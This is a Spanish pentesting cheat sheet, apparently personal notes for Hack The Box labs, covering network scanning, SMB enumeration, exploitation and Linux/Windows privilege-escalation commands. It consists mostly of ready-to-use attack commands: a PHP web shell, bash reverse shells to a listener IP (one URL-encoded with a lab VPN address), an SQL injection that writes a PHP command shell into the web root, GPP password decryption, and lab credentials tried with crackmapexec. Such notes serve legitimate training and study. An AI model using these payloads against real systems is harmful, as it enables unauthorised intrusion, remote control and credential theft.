Comandos y recursos
En construcción 🛠
RECONOCIMIENTO Y ESCANEO
Nmap
nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv {IP} -oN escaneo.txtwhatweb
whatweb http://ejemplo.com/wfuzz
wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://ejemplo.com/FUZZdirb
dirb http://ejemplo.com/DETECTAR EQUIPOS CONECTADOS A MI RED CON NETDISCOVER
netdiscover -i eth0 -r 192.168.0.0/24DETECTAR EQUIPOS CONECTADOS A MI RED CON ARP-SCAN
arp-scan -I {IFACE} --localnetsmbmap para listar recursos compartidos
smbmap -H 10.10.10.100smbmap para listar directorios de recursos compartidos
smbmap -H 10.10.10.100 -r Replication
smbmap -H 10.10.10.100 -r Replication/active.htb
smbmap -H 10.10.10.100 -r Replication/active.htb/Policiessmbmap para descargar archivos de recursos compartidos
smbmap -H 10.10.10.100 --download Replication/Groups/Groups.xmlcrackmapexec para verificar información
crackmapexec smb 10.10.10.100crackmapexec para verificar credenciales validas
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'crackmapexec para listar recursos compartidos y los permisos en los mismos con credenciales validas
crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --sharesEXPLOTACIÓN
Código PHP malicioso para ganar Reverse Shell
<?php
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>Obtención de reverse shell desde navegador
bash -c 'bash -i >& /dev/tcp/{IP}/443 0>&1'Reverse shell desde navegador URL encodeado
(En mi caso, está URL-encodeado con mi IP que me asigna la VPN de Hack The Box, por el puerto 443)
%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%31%34%2e%31%32%2f%34%34%33%20%30%3e%26%31%27Obtención de reverse shell desde una consola
bash -i >& /dev/tcp/{IP}/443 0>&1Inyección SQL para listar bases de datos
' UNION SELECT database()-- -Inyección SQL para crear archivo PHP malicioso para RCE
' union select "<?php system($_REQUEST['cmd']); ?>" into outfile "/var/www/html/revshell.php"-- -netcat en escucha por el puerto 443
nc -nlvp 443Configurar proxy de Burp Suite para Firefox
Vamos a abrir Burp Suite y nos vamos a ir a la pestaña de "Proxy":

Vamos a ir a la configuración del proxy de Burp, en la subpestaña de "Proxy settings":

Vemos que el proxy, esta configurado con la IP 127.0.0.1 por el puerto 8080, sabiendo esto, vamos a ir a Firefox en nuestro Kali, y nos vamos a ir a ajustes del navegador o settings:

En el cuadro de busqueda de opciones, vamos a buscar la palabra clave "network"

Vamos a abrir la configuración de red, con el boton "Settings"

Vamos a darla a "Manual proxy configuration" y lo configuraremos con la IP y puerto correspondiente del proxy de Burp, en este caso la IP 127.0.0.1 y el puerto 8080

Vamos a aceptar con el boton "Ok", este paso no necesariamente tiene por que ser así, podemos configurar el proxy de Burp con la extensión de Foxy Proxy
Abrimos Burp Suite de nuevo y nos ponemos en modo intercepción:

gpp-decrypt
gpp-decrypt en Kali Linux se utiliza para descifrar contraseñas almacenadas en los archivos de configuración Groups.xml que son generados por Microsoft Windows en el contexto de las Preferencias de Directiva de Grupo (Group Policy Preferences, GPP).
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"Diccionarios
COMPARTIR ARCHIVOS A MAQUINA OBJETIVO
COMPARTIR ARCHIVOS POR SERVIDOR WEB DE PYTHON
sudo python3 -m http.server {puerto, ejemplo 80}impacket-smbserver para pasar archivos desde SMB
impacket-smbserver {Nombre del recurso compartido} {Directorio a comportir} -smb2supportEjemplo:
impacket-smbserver recurso $(pwd) -smb2supportCopiar o bajar archivos desde SMB de un recurso compartido en Windows
copy \\{IP VPN HTB}\{Nombre del recurso}\churrasco.exe {Nombre de salida del archivo}ESCALADO DE PRIVILEGIOS
TRATAMIENTO DE LA TTY
Para crearnos una pseudo-consola donde no tengamos problemas con el teclado ejecutamos lo siguiente:
script /dev/null -c bash
control z
stty raw -echo; fg
reset xterm
export SHELL=bash
export TERM=xtermBusqueda de archivos SUID
find / -perm -u=s -type f 2>/dev/nullPermisos de un usuario Linux
sudo -lCapabilities
getcap -r / 2>/dev/nullPermisos de un usuario Windows
whoami /privÚltima actualización

